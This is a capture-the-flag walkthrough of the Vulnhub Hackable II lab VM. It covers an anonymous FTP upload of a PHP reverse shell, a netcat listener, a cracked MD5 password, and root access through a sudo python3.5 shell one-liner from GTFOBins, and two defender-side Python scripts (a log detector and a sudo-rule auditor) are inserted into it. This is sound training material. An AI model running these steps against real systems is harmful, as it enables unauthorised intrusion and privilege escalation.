Vulnhub: Hackable II Detailed Walkthrough

Hackable II

Author: Jason_huawen

Basic information about the target

Name: Hackable: II

URL: https://www.vulnhub.com/entry/hackable-ii,711/

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Hackable_II]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.217.0/16   |   Screen View: Unique Hosts       
                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor           
 192.168.56.100  08:00:27:69:61:df      1      60  PCS Systemtechnik GmbH   
 192.168.56.207  08:00:27:1d:cd:39      1      60  PCS Systemtechnik GmbH  

Using the netdiscover tool that ships with Kali Linux, the target host's IP address is identified as 192.168.56.207.

NMAP scan

└─$ sudo nmap -sS -sV -sC -p- 192.168.56.207 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-22 00:10 EST
Nmap scan report for bogon (192.168.56.207)
Host is up (0.00054s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--   1 0        0             109 Nov 26  2020 CALL.html
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 2f:c6:2f:c4:6d:a6:f5:5b:c2:1b:f9:17:1f:9a:09:89 (RSA)
|   256 5e:91:1b:6b:f1:d8:81:de:8b:2c:f3:70:61:ea:6f:29 (ECDSA)
|_  256 f1:98:21:91:c8:ee:4d:a2:83:14:64:96:37:5b:44:3d (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 08:00:27:1D:CD:39 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.69 seconds

The NMAP scan shows that the target host has 3 open ports: 21 (FTP), 22 (SSH) and 80 (HTTP).

Get Access

Start information gathering with the target host's FTP service:

┌──(kali㉿kali)-[~/Vulnhub/Hackable_II]
└─$ ftp 192.168.56.207
Connected to 192.168.56.207.
220 ProFTPD Server (ProFTPD Default Installation) [192.168.56.207]
Name (192.168.56.207:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password: 
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||48553|)
150 Opening ASCII mode data connection for file list
drwxr-xrwx   2 33       33           4.0k Nov 26  2020 .
drwxr-xrwx   2 33       33           4.0k Nov 26  2020 ..
-rw-r--r--   1 0        0             109 Nov 26  2020 CALL.html
226 Transfer complete
ftp> get CALL.html
local: CALL.html remote: CALL.html
229 Entering Extended Passive Mode (|||46279|)
150 Opening BINARY mode data connection for CALL.html (109 bytes)
100% |********************************|   109      231.40 KiB/s    00:00 ETA
226 Transfer complete
109 bytes received in 00:00 (78.67 KiB/s)
ftp> quit
221 Goodbye.

There is a single file, CALL.html. Download it to Kali Linux and inspect it; the file content itself is of little value.

┌──(kali㉿kali)-[~/Vulnhub/Hackable_II]
└─$ cat CALL.html 
<html>

<head>
        <title>onion</title>
</head>

<body>
        <h1>GET READY TO RECEIVE A CALL</h1>

</body>

</html>

Visiting port 80 in a browser returns the Apache default page, but the page source contains the following comment:

<!--
    Do you like gobuster? dirb? etc...

  -->
┌──(kali㉿kali)-[~/Vulnhub/Hackable_II]
└─$ gobuster dir -u http://192.168.56.207 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.207
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/11/22 00:14:14 Starting gobuster in directory enumeration mode
===============================================================
/files                (Status: 301) [Size: 316] [--> http://192.168.56.207/files/]                                                                        
/server-status        (Status: 403) [Size: 279]
Progress: 217567 / 220561 (98.64%)===============================================================
2022/11/22 00:14:37 Finished
===============================================================

The file in this files directory is the same CALL.html that sits on the FTP server. Does that mean a shell.php can be uploaded over FTP and then requested in the browser to obtain a shell?

┌──(kali㉿kali)-[~/Vulnhub/Hackable_II]
└─$ curl http://192.168.56.207/files/    
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /files</title>
 </head>
 <body>
<h1>Index of /files</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="CALL.html">CALL.html</a></td><td align="right">2020-11-26 13:02  </td><td align="right">109 </td><td>&nbsp;</td></tr>
   <tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.18 (Ubuntu) Server at 192.168.56.207 Port 80</address>
</body></html>

┌──(kali㉿kali)-[~/Vulnhub/Hackable_II]
└─$ ftp 192.168.56.207
Connected to 192.168.56.207.
220 ProFTPD Server (ProFTPD Default Installation) [192.168.56.207]
Name (192.168.56.207:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password: 
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||11174|)
150 Opening ASCII mode data connection for file list
drwxr-xrwx   2 33       33           4.0k Nov 26  2020 .
drwxr-xrwx   2 33       33           4.0k Nov 26  2020 ..
-rw-r--r--   1 0        0             109 Nov 26  2020 CALL.html
226 Transfer complete
ftp> put shell.php 
local: shell.php remote: shell.php
229 Entering Extended Passive Mode (|||20677|)
150 Opening BINARY mode data connection for shell.php
100% |***********************************************************************************************************************************************************************************************|  5496      121.89 MiB/s    00:00 ETA
226 Transfer complete
5496 bytes sent in 00:00 (9.16 MiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||49299|)
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 0        0             109 Nov 26  2020 CALL.html
-rw-r--r--   1 ftp      ftp          5496 Nov 22 05:19 shell.php
226 Transfer complete
ftp> 

shell.php uploads successfully. Next, check whether this PHP file can be reached; it should be under the files directory, and the browser can indeed access it:

http://192.168.56.207/files/shell.php

The reverse shell from the target host is received on Kali Linux:

┌──(kali㉿kali)-[~/Vulnhub/Hackable_II]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.207] 55092
Linux ubuntu 4.4.0-194-generic #226-Ubuntu SMP Wed Oct 21 10:19:36 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 02:20:46 up 22 min,  0 users,  load average: 0.23, 1.64, 1.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/$ 
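The chain above works because a directory writable over anonymous FTP is served by Apache with PHP execution enabled. As an added defender-side example (not part of the original write-up), the following Python script scans Apache access-log lines for scripts that were executed inside such an upload directory; the log lines are constructed for the example and the list of upload directories is an assumption.

```python
import re
from typing import Dict, List

# Constructed sample lines in Apache combined log format (not taken from the original page).
# The fourth line models the shell.php request; the last one models a request Apache blocked.
SAMPLE_LOG = """\
192.168.56.206 - - [22/Nov/2022:02:19:40 -0500] "GET /files/ HTTP/1.1" 200 316 "-" "curl/7.85.0"
192.168.56.206 - - [22/Nov/2022:02:19:55 -0500] "GET /files/CALL.html HTTP/1.1" 200 109 "-" "Mozilla/5.0"
192.168.56.206 - - [22/Nov/2022:02:20:46 -0500] "GET /index.html HTTP/1.1" 200 11321 "-" "Mozilla/5.0"
192.168.56.206 - - [22/Nov/2022:02:20:46 -0500] "GET /files/shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.56.206 - - [22/Nov/2022:02:21:10 -0500] "GET /files/test.php?x=1 HTTP/1.1" 403 279 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Directories that receive files from an untrusted channel (here the anonymous FTP root) and
# must therefore never serve server-side scripts. Assumed for the example.
UPLOAD_DIRS = ("/files/",)
SCRIPT_EXT = (".php", ".phtml", ".php5", ".phar")


def find_script_hits(log_text: str, upload_dirs=UPLOAD_DIRS, script_ext=SCRIPT_EXT) -> List[Dict[str, str]]:
    """Return every request that executed a script inside an upload directory.

    A 403 or 404 means Apache refused or could not find the file, so those are not executions.
    """
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        path = m.group("path").split("?", 1)[0].lower()
        if not path.startswith(upload_dirs) or not path.endswith(script_ext):
            continue
        if m.group("status") in ("403", "404"):
            continue
        hits.append({"ip": m.group("ip"), "ts": m.group("ts"),
                     "path": m.group("path"), "status": m.group("status")})
    return hits


if __name__ == "__main__":
    for h in find_script_hits(SAMPLE_LOG):
        print(f"ALERT script executed in upload dir: {h['ip']} {h['ts']} {h['path']} -> {h['status']}")
```

The matching fix on the server side is to deny script handlers in that directory (or make the FTP directory non-writable for anonymous users), so that the 403 case above is what every such request produces.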
There is a file in the /home directory:

www-data@ubuntu:~/html/files$ cd /home
cd /home
www-data@ubuntu:/home$ ls
ls
important.txt  shrek
www-data@ubuntu:/home$ cat important.txt
cat important.txt
run the script to see the data

/.runme.sh
www-data@ubuntu:/home$ 
www-data@ubuntu:/home$ ls -alh /.runme.sh
ls -alh /.runme.sh
-rwxr-xr-x 1 shrek shrek 1.2K Nov 26  2020 /.runme.sh
www-data@ubuntu:/home$ cat /.runme.sh
cat /.runme.sh
#!/bin/bash
echo 'the secret key'
sleep 2
echo 'is'
sleep 2
echo 'trolled'
sleep 2
echo 'restarting computer in 3 seconds...'
sleep 1
echo 'restarting computer in 2 seconds...'
sleep 1
echo 'restarting computer in 1 seconds...'
sleep 1
echo '⡴⠑⡄⠀⠀⠀⠀⠀⠀⠀ ⣀⣀⣤⣤⣤⣀⡀
⠸⡇⠀⠿⡀⠀⠀⠀⣀⡴⢿⣿⣿⣿⣿⣿⣿⣿⣷⣦⡀
⠀⠀⠀⠀⠑⢄⣠⠾⠁⣀⣄⡈⠙⣿⣿⣿⣿⣿⣿⣿⣿⣆
⠀⠀⠀⠀⢀⡀⠁⠀⠀⠈⠙⠛⠂⠈⣿⣿⣿⣿⣿⠿⡿⢿⣆
⠀⠀⠀⢀⡾⣁⣀⠀⠴⠂⠙⣗⡀⠀⢻⣿⣿⠭⢤⣴⣦⣤⣹⠀⠀⠀⢀⢴⣶⣆
⠀⠀⢀⣾⣿⣿⣿⣷⣮⣽⣾⣿⣥⣴⣿⣿⡿⢂⠔⢚⡿⢿⣿⣦⣴⣾⠸⣼⡿
⠀⢀⡞⠁⠙⠻⠿⠟⠉⠀⠛⢹⣿⣿⣿⣿⣿⣌⢤⣼⣿⣾⣿⡟⠉
⠀⣾⣷⣶⠇⠀⠀⣤⣄⣀⡀⠈⠻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇
⠀⠉⠈⠉⠀⠀⢦⡈⢻⣿⣿⣿⣶⣶⣶⣶⣤⣽⡹⣿⣿⣿⣿⡇
⠀⠀⠀⠀⠀⠀⠀⠉⠲⣽⡻⢿⣿⣿⣿⣿⣿⣿⣷⣜⣿⣿⣿⡇
⠀⠀ ⠀⠀⠀⠀⠀⢸⣿⣿⣷⣶⣮⣭⣽⣿⣿⣿⣿⣿⣿⣿⠇
⠀⠀⠀⠀⠀⠀⣀⣀⣈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠇
⠀⠀⠀⠀⠀⠀⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
    shrek:cf4c2232354952690368f1b3dfdfb24d'
www-data@ubuntu:/home$ 

The script contains an MD5 hash. Looking it up on an online MD5 cracking site yields onion, which is presumably shrek's password.

www-data@ubuntu:/home$ su - shrek
su - shrek
Password: onion

shrek@ubuntu:~$ id
id
uid=1000(shrek) gid=1000(shrek) groups=1000(shrek)
shrek@ubuntu:~$ 

Successfully switched to the shrek user.

Privilege escalation

shrek@ubuntu:~$ sudo -l
sudo -l
Matching Defaults entries for shrek on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shrek may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/python3.5
shrek@ubuntu:~$ 

Python3.5 can be used to escalate privileges, following the method given on the GTFOBins site:

Sudo

If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

    sudo python -c 'import os; os.system("/bin/sh")'
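The rule above is exploitable because python3.5 is an interpreter, so allowing it as root is the same as allowing a root shell. As an added example that is not from the original post or from GTFOBins, the following Python auditor parses `sudo -l` output and flags rules that let a shell-equivalent binary run as root; the sample output, the extra rules and the list of binaries are assumptions constructed for the example.

```python
import re
from typing import Dict, List

# Constructed sample in the shape of `sudo -l` output; the user, host and the extra rules are assumptions.
SAMPLE_SUDO_L = r"""
Matching Defaults entries for shrek on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shrek may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/python3.5
    (root) /usr/bin/apt-get update
    (ALL) NOPASSWD: /usr/bin/systemctl restart apache2
"""

# Binaries that hand the caller an arbitrary command as the run-as user (interpreters, shells,
# editors, pagers). Allowing one of them as root is equivalent to allowing /bin/bash as root.
SHELL_EQUIVALENT = re.compile(
    r"^(python[0-9.]*|perl|ruby|node|lua[0-9.]*|php|bash|sh|dash|zsh|vim?|nano|less|more|awk|gawk|find)$"
)

# One rule line: "(runas[:group]) [TAG: TAG: ...] command [args]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")


def audit_sudo_l(text: str) -> List[Dict[str, str]]:
    """Return the rules in `sudo -l` output that effectively grant full root."""
    findings = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True  # every line after this header is a rule
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()
        tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
        cmd = m.group("cmd").strip()
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        if runas not in ("root", "ALL"):
            continue
        if cmd == "ALL":
            findings.append({"cmd": cmd, "binary": binary, "severity": "critical",
                             "reason": "any command as root"})
        elif SHELL_EQUIVALENT.match(binary):
            sev = "critical" if "NOPASSWD" in tags else "high"
            findings.append({"cmd": cmd, "binary": binary, "severity": sev,
                             "reason": "shell-equivalent binary runnable as root"})
    return findings


if __name__ == "__main__":
    for f in audit_sudo_l(SAMPLE_SUDO_L):
        print(f"[{f['severity']}] {f['cmd']}: {f['reason']}")
```

The remediation is to grant a wrapper script with fixed arguments instead of the bare interpreter, or to drop the rule entirely.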
sudo /usr/bin/python3.5 -c 'import os; os.system("/bin/sh")'
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# ls -ahl
ls -ahl
total 32K
drw-------  4 root root 4.0K Jun 15  2021 .
drwxr-xr-x 23 root root 4.0K Nov 26  2020 ..
-rw-------  1 root root   13 Jun 15  2021 .bash_history
-rw-------  1 root root 3.1K Oct 22  2015 .bashrc
drw-------  2 root root 4.0K Nov 25  2020 .cache
drw-------  2 root root 4.0K Nov 25  2020 .nano
-rw-------  1 root root  148 Aug 17  2015 .profile
-rw-------  1 root root 1.6K Jun 15  2021 root.txt
# cat root.txt
cat root.txt
                            ____
        ____....----''''````    |.
,'''````            ____....----; '.
| __....----''''````         .-.`'. '.
|.-.                .....    | |   '. '.
`| |        ..:::::::::::::::| |   .-;. |
 | |`'-;-::::::::::::::::::::| |,,.| |-='
 | |   | ::::::::::::::::::::| |   | |
 | |   | :::::::::::::::;;;;;| |   | |
 | |   | :::::::::;;;2KY2KY2Y| |   | |
 | |   | :::::;;Y2KY2KY2KY2KY| |   | |
 | |   | :::;Y2Y2KY2KY2KY2KY2| |   | |
 | |   | :;Y2KY2KY2KY2KY2K+++| |   | |
 | |   | |;2KY2KY2KY2++++++++| |   | |
 | |   | | ;++++++++++++++++;| |   | |
 | |   | |  ;++++++++++++++;.| |   | |
 | |   | |   :++++++++++++:  | |   | |
 | |   | |    .:++++++++;.   | |   | |
 | |   | |       .:;+:..     | |   | |
 | |   | |         ;;        | |   | |
 | |   | |      .,:+;:,.     | |   | |
 | |   | |    .::::;+::::,   | |   | |
 | |   | |   ::::::;;::::::. | |   | |
 | |   | |  :::::::+;:::::::.| |   | |
 | |   | | ::::::::;;::::::::| |   | |
 | |   | |:::::::::+:::::::::| |   | |
 | |   | |:::::::::+:::::::::| |   | |
 | |   | ::::::::;+++;:::::::| |   | |
 | |   | :::::::;+++++;::::::| |   | |
 | |   | ::::::;+++++++;:::::| |   | |
 | |   |.:::::;+++++++++;::::| |   | |
 | | ,`':::::;+++++++++++;:::| |'"-| |-..
 | |'   ::::;+++++++++++++;::| |   '-' ,|
 | |    ::::;++++++++++++++;:| |     .' |
,;-'_   `-._===++++++++++_.-'| |   .'  .'
|    ````'''----....___-'    '-' .'  .'
'---....____           ````'''--;  ,'
            ````''''----....____|.'

invite-me: https://www.linkedin.com/in/eliastouguinho/# 

Privilege escalation succeeded and the root flag is obtained.

Posted 2022-11-22 13:39 by Jason_huawen